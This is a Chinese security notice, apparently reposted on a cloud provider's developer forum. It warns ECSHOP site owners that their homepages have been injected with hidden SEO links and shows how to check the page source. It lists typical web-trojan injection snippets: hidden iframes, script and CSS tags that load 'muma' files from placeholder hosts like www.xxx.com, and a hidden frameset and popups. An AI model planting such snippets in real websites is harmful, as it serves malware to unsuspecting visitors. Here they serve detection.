近日发现多家使用ECSHOP开源程序(多个版本)的网站首页被篡改,被插入seo暗链的恶意代码。使用ecshop的用户多数为了优化“ugg”关键字,请自行进行检查。
检查方法:
打开网站主页,右键查看网站源码,搜索“ugg”。
<iframe src=地址 width=0 height=0></iframe>
document.write("<iframe width='0' height='0' src='地址'></iframe>");
<script language=javascript src=xxx.js></script>
<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
top.document.body.innerHTML = top.document.body.innerHTML '\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>';
body {
background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}
<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>
<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>
<frameset rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0" margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
<a href="http://www.xxx.com(迷惑连接地址,显示这个地址指向木马地址)" > 页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。